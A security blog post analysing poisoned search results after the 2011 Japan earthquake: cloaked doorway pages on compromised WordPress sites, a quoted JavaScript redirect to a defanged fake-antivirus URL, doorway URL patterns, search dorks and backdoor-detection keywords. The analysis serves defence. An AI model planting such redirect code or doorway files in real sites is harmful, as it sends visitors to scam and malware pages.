msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Major Disasters in Poisoned Search Results

   14 Mar 11   Filed in Website exploits

Only a few hours after the Friday’s 8.9 earthquake and the consequent tsunami hit Japan, security researchers noticed many poisoned Google search results for this news related searches that redirected web surfers to fake antivirus sites.

This situation nothing new. We’ve seen similarly poisoned search results for Haitian earthquake a year ago, for the recent New Zealand’s earthquake, for last year’s floods in Pakistan, etc.

Many people use search engines to find details about breaking news such as natural disasters, catastrophes, accidents, etc. Such hardly predictable events, have literally zero relevant results before they happen, so during the first few hours after the event almost any site with relevant information have good chances to rank high on Google. This short window when competition is quite light is all cyber-criminal need to have a steady traffic to their breaking new related doorway pages. Then, when every news site and blog add their 2 cents and there are plenty resources about those hot topics, only most reputable and most relevant web pages make it to the top of search results.

I decided to check the poisoned search results and here’s what I found:

1. Compromised legitimate websites

Hackers create doorways pages on compromised legitimate websites. They have many reasons to do so. Pages on established sites usually rank better. Moreover, it’s clueless site owners who pay for domains, servers and bandwidths.

2. Cloaking

They use a black hat SEO technique called cloaking to provide search engines with one version of content (news related, stuffed with relevant keywords) and another content for web surfers who come from search engines (redirect to a malicious site). Visitors who don’t come from search engines usually see a blank page or the 404 error(page not found).

Fore example, here’s what Googlebot sees (via Google cache):

Most Recent Earthquakes in Japan

And here is what web surfers see when they click on poisoned search results:

Fake AV

3. JavaScript redirects

To redirect visitors to malicious sites, hackers use (in this particular attack) the following JavaScript

var url = "hxxp://www3.addfreeprotectionwa .cz.cc/?6212ee=m%2Bzgl2uTlp2emNXO1K%2BimtnX4KbVn6%2BWkJOrYpuaa1Y%3D";
if (window!=top) {top.location.href = url;}
//else document.location= url;

(Infamous .cc domains. In some cases I’ve seen “*.rr.nu” domains) The domain names of malicious sites regularly change, which proves that hackers actively control compromised websites.

4. Old WordPress

The majority of the compromised sites are WordPress blogs that use old versions of WP (e.g. 2.5.x and 2.6.x)

5. URL patterns

The most common URL pattern of the doorway pages is hxxp://example .com/wp-admin/images/logos.php?itemid=keywords

Some other, less prevalent, patterns are:

wp-admin/import/rs.php?itemid
wp-admin/import/st.php?itemid
wp-admin/import/dotcl.php?itemid
wp-admin/includes/pos.php?itemid
wp-admin/includes/med.php?itemid
wp-includes/images/smilies/icon_sa.php?itemid
wp-includes/var.php?itemid?itemid
wp-includes/images/crystal/cod.php?itemid
wp-content/plugins/sociable/images/liv.php?itemid
wp-content/uploads/2008/12/logos.php?itemid
...

As you can see all these patterns use .php files that clearly break WordPress conventions. For example,

  • there shouldn’t be any public indexable pages in /wp-admin and /wp-includes directories
  • the files are not core WordPress files and users are not supposed to change anything inside /wp-admin and /wp-includes directories
  • while it is a normal practice to add custom files into /wp-content directory, it’s very suspicious to see .php files in images directories
  • it is even more suspicious to see .php files in the uploads directories — which may be a strong sign of a site compromise.

6. Prevalence estimates

Given the URL patterns of the doorway pages differ from legitimate WordPress URL patterns, we can use Google’s inurl search operator to estimate the scale of this problem.

For example, for the [inurl:"wp-admin * php itemid"] search, Google currently returns 22 million results (warning: don’t click on search results).

22 million results

I estimate that more than 90% of them are malicious backdoor pages.

Most of them target various “hot news” topics. Let’s check how many of them mention disasters: ["inurl:wp admin images logos php" disaster]

disaster doorways

At this point I can see almost 1.5 million doorway results on disasters — this sort of news is probably the most “profitable” for criminals — people shocked with the news are less likely to be looking what links they are clicking on.

Now more specific query: ["inurl:wp admin images logos php" "most recent earthquake"] – 1,750 doorways that cover many high seismic risk regions: California, Japan, Taiwan, Chile, New Zealand, etc.

To find the number of index doorway pages on individual compromised websites I used the ["inurl:wp admin images logos php" site:example.com] searches (replacing “example.com” with actual domain names). The average number is about 20,000 indexed doorway pages per site. On some sites this number is as high as 100,000. On others it may be just a couple of thousand.

In any case, we can see that hackers generate at least several dozen new doorway pages on each compromised site every day targeting all sorts of news topics. So, every days they have quite a steady stream of clueless web searcher who use Google to learn more about hot news: from disasters to the latest rumors about celebrities.

7. Lack of malware warnings

To protect web searchers from security risks, Google displays the “This site may harm your computer” warning on search results from known blacklisted sites. Web browsers like Firefox, Safari and Google Chrome also display similar warnings when people try to open such sites.

Unfortunately, at this moment Google is aware of only about 5% of websites with such malicious backdoor pages, so don’t expect them to warn you.

To Google

Come on Google, I’m sure you are aware of this problem. Why not feed the results of the [inurl:"wp-admin * php itemid"] query to your malware scanners?

Bonus: understanding the WordPress URL structure, we can easily reveal some other poisoned search results. E.g. ["inurl:wp admin images * php" -logos] currently returns 327,000 search results and I can clearly see another malware attack that uses the “/wp-admin/images/dating/index.php?” URL pattern (again, most of them are not blacklisted yet).

To web searchers

Look before you click on search results. Especially if you are searching for the latest news, at least ask your self whether the site can be a source or trustworthy information about the topic. Pay a special attention to the link pattern — Google displays it for a good reason.

To webmasters

1. Make sure all third party applications that you use on your web sites are up-to-date and fully patched. Using an old version of WordPress is like an invitation to hackers to abuse your site.

2. Regularly check web pages indexed on your site. Use either Google Webmaster Tool or the [site:example.com] Google search (replace example.com with your site’s domain name). You may find some unexpected pages there.

3. Regularly check what search keyword people use to find your site. Google Analytics is not enough here as the doorway page don’t contain your tracking code. You should either analyze raw server log (or any log-based statistics) or check the “Search queries” and “Keywords” reports in Google Webmaster Tools — you may discover that your site rank for quite unrelated keywords.

4. If your site happens to be one of the compromised blogs, not only should you remove those doorway files (e.g. “wp-admin/images/logos.php“) but also find and remove backdoor files that hackers have uploaded to your server. Here are some keywords to search for: “eval“, “base64_decode“, “edoced_46esab“, “gzinflate“, “gzuncompress” , “eval(stripslashes“, “FilesMan“.

Do you have anything to add?

In this post I covered only one type of Google results poisoning for news related searches. Have you seen any other similar black hat SEO campaign? Have you identified other Google searches that mainly return links to malicious web pages? Your information and comments are welcome.

Related posts:

Reader's Comments (4)

  1. |

    [...] Major Disasters in Poisoned Search Results, Unmask Parasites. Blog. [...]

  2. |

    I would love to know what you recommend should you land on such a page.

    • |

      Most of such pages (fake anti-virus) are not malicious. Nothing will happen if you don’t agree to download and install that software. Just close the page, warnings and download dialog boxes. Always choose “Cancel”, never “OK”.

      I also suggest that you use the NoScript extension with the latest version of Firefox. In this case you will not even see the warnings since all those scam sites extensively use JavaScript.

      • |

        Thx. I’m usually VERY careful about doing just that – but I got hit with that very thing.

        I couldn’t “X” it out. So I shut down my computer and was still infected.

        I was using IE 8. Maybe I should use FF more often. :-)